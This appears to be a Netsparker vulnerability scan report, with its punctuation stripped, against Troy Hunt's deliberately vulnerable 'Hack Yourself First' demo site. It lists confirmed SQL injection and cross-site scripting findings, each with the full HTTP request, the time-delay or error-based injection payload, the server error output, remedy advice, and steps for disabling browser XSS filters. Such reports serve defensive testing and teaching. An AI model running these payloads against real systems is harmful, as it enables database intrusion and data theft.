RequestGET Make3orderby=1+WAITFOR+DELAY+2703a03a2527-- HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
7 57
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 230647 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 1811Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtPaganis - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligt
hellip
14 Make2 CONFIRMEDhttphackyourselffirsttroyhuntcomMake2orderby=1+WAITFOR+DELAY+2703a03a2527--
ParametersParameter Type Value
orderby GET 1 WAITFOR DELAY 0025--
RequestGET Make2orderby=1+WAITFOR+DELAY+2703a03a2527-- HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
8 57
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 230334 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 1811Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtMcLarens - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligt
hellip
15 apivote CONFIRMEDhttphackyourselffirsttroyhuntcomapivote
ParametersParameter Type Value
userId POST 1
supercarId POST 3
comments POST ) WAITFOR DELAY 0025--
RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 68Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=27)+WAITFOR+DELAY+2703a03a2527--
ResponseHTTP11 201 CreatedCache-Control no-cacheDate Mon 25 Aug 2014 232122 GMTPragma no-cacheServer Microsoft-IIS80X-XSS-Protection 0X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 0Expires -1
9 57
5 TOTALCRITICAL
CONFIRMED
5
2 SQL InjectionNetsparkeridentifiedanSQLinjectionwhichoccurswhendatainputbyauserisinterpretedasanSQLcommandratherthanasnormaldatabythebackenddatabase
Thisisanextremelycommonvulnerabilityanditssuccessfulexploitationcanhavecriticalimplications
NetsparkerconfirmedthevulnerabilitybyexecutingatestSQLqueryonthebackenddatabase
ImpactDependingonthebackenddatabasethedatabaseconnectionsettingsandtheoperatingsystemanattackercanmountoneormoreofthefollowingtypeofattackssuccessfully
ReadingupdatinganddeletingarbitrarydataortablesfromthedatabaseExecutingcommandsontheunderlyingoperatingsystem
Actions to Take1 Seetheremedyforsolution2 Ifyouarenotusingadatabaseaccesslayer(DAL)considerusingoneThiswillhelpyoucentralizetheissueYoucanalsouseORM(object relational mapping)MostoftheORMsystemsuseonlyparameterizedqueriesandthiscansolvethewholeSQLinjectionproblem
3 LocateallofthedynamicallygeneratedSQLqueriesandconvertthemtoparameterizedqueries(If you decide to use a DALORM changeall legacy code to use these new libraries)
4 Useyourweblogsandapplicationlogstoseeiftherewereanypreviousbutundetectedattackstothisresource
RemedyArobustmethodformitigatingthethreatofSQLinjection-basedvulnerabilitiesistouseparameterizedqueries(prepared statements)Almostallmodernlanguagesprovidebuilt-inlibrariesforthisWhereverpossibledonotcreatedynamicSQLqueriesorSQLquerieswithstringconcatenation
Required Skills for Successful ExploitationTherearenumerousfreelyavailabletoolstoexploitSQLinjectionvulnerabilitiesThisisacomplexareawithmanydependencieshoweveritshouldbenotedthatthenumerousresourcesavailableinthisareahaveraisedbothattackerawarenessoftheissuesandtheirabilitytodiscoverandleveragethemSQLinjectionisoneofthemostcommonwebapplicationvulnerabilities
External ReferencesOWASPSQLinjectionSQLinjectionCheatsheet
Remedy ReferencesMSDN-ProtectFromSQLinjectioninASPNET
ClassificationOWASP2010-A1OWASP2013-A1PCIV20-651PCIV30-651CWE-89CAPEC-66WASC-19
21 apivote CONFIRMEDhttphackyourselffirsttroyhuntcomapivote
ParametersParameter Type Value
userId POST 1
supercarId POST 3
comments POST (select convert(intCHAR(95) CHAR(33)CHAR(64) CHAR(50) CHAR(100)CHAR(105) CHAR(108) CHAR(101) C
Extracted Datamicrosoft sql azure (rtm) - 110922217 ntaug 20 2014 223756 ntcopyright (c) microsoft corporationn
10 57
RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 209Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=272b+(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns)+2b27
ResponsehellipPNETContent-Length 2867Content-Type applicationjson charset=utf-8Expires -1
MessageAn error has occurredExceptionMessageConversion failed when converting the varchar value _2dilemma to data typeintExceptionTypeSystemDataSqlClientSqlExceptionStackTrace at SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnectionAction`1 wraphellip
22 SupercarLeaderboard CONFIRMEDhttphackyourselffirsttroyhuntcomSupercarLeaderboardorderBy=(select+convert(int2cCHAR(95)2b
ParametersParameter Type Value
orderBy GET (select convert(intCHAR(95) CHAR(33)CHAR(64) CHAR(50) CHAR(100)CHAR(105) CHAR(108) CHAR(101)CHAR
asc GET false
Extracted Datamicrosoft sql azure (rtm) - 110922217 ltbrgt aug 20 2014 223756 ltbrgt copyright (c) microsoft corporationltbrgt
RequestGET SupercarLeaderboardorderBy=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns)ampasc=false HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept texthtmlapplicationxhtml+xmlapplicationxmlq=09imagewebpq=08Referer httphackyourselffirsttroyhuntcomSupercarLeaderboardAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
11 57
Responsehellip30319X-Powered-By ASPNETContent-Length 14292Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack
hellipltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the hellipe error and where it originated in the code
ltbrgtltbrgt
ltbgt Exception Details ltbgtSystemDataSqlClientSqlException Conversion failed when converting the varchar value _2dilemma to data type intltbrgtltbrgt
ltbgtSource Errorltbgt ltbrgtltbrgt
lttable width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegt
hellipe width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegtltpregt
[SqlException (0x80131904) Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type int]SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction) +1787814SystemDataSqlClientSqlInternalConnhelliposoft NET Framework Version4030319 ASPNET Version403031936213
ltfontgt
ltbodygtlthtmlgtlt-- [SqlException] Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type intat SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)at SystemDataSqlClientSqlInternalConnectihellip
23 Make2 CONFIRMEDhttphackyourselffirsttroyhuntcomMake2orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHA
ParametersParameter Type Value
orderby GET (select convert(intCHAR(95) CHAR(33)CHAR(64) CHAR(50) CHAR(100)CHAR(105) CHAR(108) CHAR(101)CHAR
Extracted Datamicrosoft sql azure (rtm) - 110922217 ltbrgt aug 20 2014 223756 ltbrgt copyright (c) microsoft corporationltbrgt
RequestGET Make2orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns) HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
12 57
Responsehellip30319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack
hellipltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the hellipe error and where it originated in the code
ltbrgtltbrgt
ltbgt Exception Details ltbgtSystemDataSqlClientSqlException Conversion failed when converting the varchar value _2dilemma to data type intltbrgtltbrgt
ltbgtSource Errorltbgt ltbrgtltbrgt
lttable width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegt
hellipe width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegtltpregt
[SqlException (0x80131904) Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type int]SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction) +1787814SystemDataSqlClientSqlInternalConnhelliposoft NET Framework Version4030319 ASPNET Version403031936213
ltfontgt
ltbodygtlthtmlgtlt-- [SqlException] Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type intat SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)at SystemDataSqlClientSqlInternalConnectihellip
24 Make3 CONFIRMEDhttphackyourselffirsttroyhuntcomMake3orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHA
ParametersParameter Type Value
orderby GET (select convert(intCHAR(95) CHAR(33)CHAR(64) CHAR(50) CHAR(100)CHAR(105) CHAR(108) CHAR(101)CHAR
Extracted Datamicrosoft sql azure (rtm) - 110922217 ltbrgt aug 20 2014 223756 ltbrgt copyright (c) microsoft corporationltbrgt
RequestGET Make3orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns) HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
13 57
Responsehellip30319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack
hellipltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the hellipe error and where it originated in the code
ltbrgtltbrgt
ltbgt Exception Details ltbgtSystemDataSqlClientSqlException Conversion failed when converting the varchar value _2dilemma to data type intltbrgtltbrgt
ltbgtSource Errorltbgt ltbrgtltbrgt
lttable width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegt
hellipe width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegtltpregt
[SqlException (0x80131904) Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type int]SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction) +1787814SystemDataSqlClientSqlInternalConnhelliposoft NET Framework Version4030319 ASPNET Version403031936213
ltfontgt
ltbodygtlthtmlgtlt-- [SqlException] Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type intat SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)at SystemDataSqlClientSqlInternalConnectihellip
25 Make1 CONFIRMEDhttphackyourselffirsttroyhuntcomMake1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHA
ParametersParameter Type Value
orderby GET (select convert(intCHAR(95) CHAR(33)CHAR(64) CHAR(50) CHAR(100)CHAR(105) CHAR(108) CHAR(101)CHAR
Extracted Datamicrosoft sql azure (rtm) - 110922217 ltbrgt aug 20 2014 223756 ltbrgt copyright (c) microsoft corporationltbrgt
RequestGET Make1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns) HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
14 57
Responsehellip30319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack
hellipltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the hellipe error and where it originated in the code
ltbrgtltbrgt
ltbgt Exception Details ltbgtSystemDataSqlClientSqlException Conversion failed when converting the varchar value _2dilemma to data type intltbrgtltbrgt
ltbgtSource Errorltbgt ltbrgtltbrgt
lttable width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegt
hellipe width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegtltpregt
[SqlException (0x80131904) Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type int]SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction) +1787814SystemDataSqlClientSqlInternalConnhelliposoft NET Framework Version4030319 ASPNET Version403031936213
ltfontgt
ltbodygtlthtmlgtlt-- [SqlException] Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type intat SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)at SystemDataSqlClientSqlInternalConnectihellip
15 57
1 TOTALIMPORTANT
CONFIRMED
1
3 Cross-site ScriptingNetsparkerdetectedcross-sitescriptingwhichallowsanattackertoexecuteadynamicscript(JavaScript VBScript)inthecontextoftheapplication
ThisallowsseveraldifferentattackopportunitiesmostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuserscredentialsThishappensbecausetheinputenteredbyauserhasbeeninterpretedasHTMLJavaScriptVBScriptbythebrowserCross-sitescriptingtargetstheusersoftheapplicationinsteadoftheserverAlthoughthisisalimitationsinceitallowsattackerstohijackotheruserssessionsanattackermightattackanadministratortogainfullcontrolovertheapplication
ImpactTherearemanydifferentattacksthatcanbeleveragedthroughtheuseofcross-sitescriptingincluding
HijackingusersactivesessionMountingphishingattacksInterceptingdataandperformingman-in-the-middleattacks
RemedyTheissueoccursbecausethebrowserinterpretstheinputasactiveHTMLJavaScriptorVBScriptToavoidthisoutputshouldbeencodedaccordingtotheoutputlocationandcontextForexampleiftheoutputgoesintoaJavaScriptblockwithintheHTMLdocumentthenoutputneedstobeencodedaccordinglyEncodingcangetverycomplexthereforeitsstronglyrecommendedtouseanencodinglibrarysuchasOWASPESAPIandMicrosoftAnti-cross-sitescripting
Remedy ReferencesMicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheetOWASPAntiSamyJava
External ReferencesXSSCheatSheetOWASP-cross-sitescriptingXSSShellXSSTunnelling
Proof of Concept NotesGeneratedXSSexploitmightnotworkduetobrowserXSSfilteringPleasefollowtheguidelinesbelowinordertodisableXSSfilteringfordifferentbrowsersAlsonotethat
XSSfilteringisafeaturethatsenabledbydefaultinsomeofthemodernbrowsersItshouldonlybedisabledtemporarilytotestexploitsandshouldberevertedbackifthebrowserisactivelyusedotherthantestingpurposesEventhoughbrowsershavecertaincheckstopreventCross-sitescriptingattacksinpracticethereareavarietyofwaystobypassthismechanismthereforeawebapplicationshouldnotrelyonthiskindofclient-sidebrowserchecks
Chrome
OpencommandpromptGotofolderwherechromeexeislocatedRunthecommandchromeexe --args --disable-xss-auditor
InternetExplorer
ClickTools-gtInternetOptionsandthennavigatetotheSecurityTabClickCustomlevelandscrolltowardsthebottomwhereyouwillfindthatEnableXSSfilteriscurrentlyEnabledSetittodisabledClickOKClickYestoacceptthewarningfollowedbyApply
Firefox
GotoaboutconfigintheURLaddressbarInthesearchfieldtypeurlbarfilterandfindbrowserurlbarfilterjavascriptSetitsvaluetofalsebydoubleclickingtherow
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
16 57
31 Search CONFIRMEDhttphackyourselffirsttroyhuntcomSearchsearchTerm=2Bnetsparker(9)2B
ParametersParameter Type Value
searchTerm GET +netsparker(9)+
RequestGET SearchsearchTerm=2Bnetsparker(9)2B HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
Responsehellipltsectiongtltdivgtltdivgtltdivgtltdivgtltheadergt
ltdiv class=containergtltsectiongt
lth2gtYou searched for ampquotltspan id=searchTermgt+netsparker(9)+ltspangtampquotlth2gt
ltp class=alert alert-errorgtNo results found for your searchltpgt
ltsectiongtlthrgtltfootergtltpgtampcopy 2014 - Hack Yourself Firstltpgtltfootergt
hellipgtltscriptgt
ltscriptgt$(results tr)click(function () var url = Supercar + $(this)attr(id)windowlocationhref = url)
$(searchTerm)val(+netsparker(9)+)ltscriptgt
ltscriptgt(function (i s o g r a m) i[GoogleAnalyticsObject] = r i[r] = i[r] || function () (i[r]q = i[r]q || [])push(arguments) i[rhellip
17 57
1 TOTALIMPORTANT
CONFIRMED
1
4 Permanent Cross-site ScriptingNetsparkeridentifiedpermanentcross-sitescriptingandconfirmedthisvulnerabilitybyanalyzingtheexecutionofinjectedJavaScript
PermanentXSSallowsanattackertoexecutedynamicscripts(JavaScript VBScript)inthecontextoftheapplicationThisallowsseveraldifferentattackopportunitiesmostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuserscredentialsThishappensbecausetheinputenteredbytheuserhasbeeninterpretedbyHTMLJavaScriptVBScriptwithinthebrowser
PermanentmeansthattheattackwillbestoredinthebackendsystemInnormalXSSattacksanattackerneedstoe-mailthevictimbutinapermanentXSSanattackercanjustexecutetheattackandwaitforuserstoseetheaffectedpageAssoonassomeonevisitsthepagetheattackersstoredpayloadwillgetexecuted
